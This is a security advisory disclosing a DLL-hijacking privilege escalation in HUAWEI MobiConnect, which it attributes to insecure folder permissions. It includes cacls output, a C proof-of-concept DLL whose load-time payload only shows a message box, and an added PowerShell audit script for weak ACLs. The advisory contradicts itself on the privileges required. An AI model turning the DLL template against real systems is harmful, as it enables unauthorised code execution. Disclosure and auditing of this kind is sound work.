HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation

2015-09-02T00:00:00
ID SSV:89300
Type seebug
Reporter 拿破轮胎
Modified 2015-09-02T00:00:00

Description

A local privilege escalation vulnerability has been discovered in the official HUAWEI MobiConnect 23.009.17.00.216 software. The local security vulnerability allows an attacker to gain higher access privileges by executing arbitrary code in connection with DLL hijacking.

The security risk of the local privilege escalation vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 6.7. Exploitation of the vulnerability requires a local privileged system user account and no user interaction. Successful exploitation of the privilege escalation vulnerability results in software or system compromise.

Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with restricted system privileges and without user interaction.
To demonstrate or reproduce the security vulnerability, follow the information and steps provided below.

--- PoC Session Logs [Insecure Permissions Local Privilege Escalation] ---
C:\Program Files>cacls "MobiConnect"
C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
                             BUILTIN\Utilisateurs:(CI)F
                             NT SERVICE\TrustedInstaller:(ID)F
                             NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                             AUTORITE NT\Système:(ID)F
                             AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
                             BUILTIN\Administrateurs:(ID)F
                             BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
                             CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
                                             AUTORITE NT\Système:(ID)F
                                             BUILTIN\Administrateurs:(ID)F

--- PoC Session Logs [DLL Hijacking Exploit (wintab32.dll)] ---

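#include <windows.h>

/* Forward declaration: DllMain calls owned() before its definition. */
int owned(void);

BOOL WINAPI DllMain(
    HANDLE hinstDLL,
    DWORD  fdwReason,
    LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs when the host process loads the DLL. */
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Marker payload: a message box that proves the DLL was loaded. */
int owned(void)
{
    MessageBoxA(0, "MobiConnect DLL Hijacked\\Hadji Samir", "POC", MB_OK);
    return 0;
}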
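
The cacls session above shows BUILTIN\Utilisateurs (the French-localized BUILTIN\Users group) holding full control (F) over the install directory and MobiConnect.exe, which is the condition that makes the DLL hijack possible. The following PowerShell audit is an added example, not part of the original advisory: it matches well-known SIDs instead of group names so it works on any display language. The function name Get-WeakAce, the SID list and the rights mask are assumptions of this example.

```powershell
# Added example (not from the advisory): list ACEs that let low-privileged
# groups modify an install directory or the binaries inside it.
function Get-WeakAce {
    param([Parameter(Mandatory = $true)][string]$Path)

    # Well-known SIDs, independent of display language:
    # Everyone, Authenticated Users, INTERACTIVE, BUILTIN\Users
    $lowPriv = 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545'

    # Access-mask bits that allow planting or replacing files:
    #   0x00000002 WriteData/AddFile     0x00000004 AppendData/AddSubdirectory
    #   0x00000040 DeleteChild           0x00010000 Delete
    #   0x00040000 WRITE_DAC             0x00080000 WRITE_OWNER
    #   0x10000000 GENERIC_ALL           0x40000000 GENERIC_WRITE
    # The generic bits appear on inherit-only ACEs such as "(OI)(IO)F".
    $writeMask = 0x500D0046

    # The directory itself plus every executable and DLL below it.
    $items = @(Get-Item -LiteralPath $Path) +
             @(Get-ChildItem -LiteralPath $Path -Recurse -File -ErrorAction SilentlyContinue |
                   Where-Object { $_.Extension -in '.exe', '.dll' })

    foreach ($item in $items) {
        foreach ($ace in (Get-Acl -LiteralPath $item.FullName).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try {
                $sid = $ace.IdentityReference.Translate(
                    [System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # account could not be resolved to a SID

            if ($sid -in $lowPriv -and ([int]$ace.FileSystemRights -band $writeMask)) {
                [pscustomobject]@{
                    Path      = $item.FullName
                    Identity  = $ace.IdentityReference.Value
                    Sid       = $sid
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Directory taken from the advisory's cacls session.
Get-WeakAce -Path 'C:\Program Files\MobiConnect' | Format-Table -AutoSize
```

Rows with Inherited = False correspond to explicit ACEs, like the BUILTIN\Utilisateurs entries that carry no (ID) flag in the cacls output.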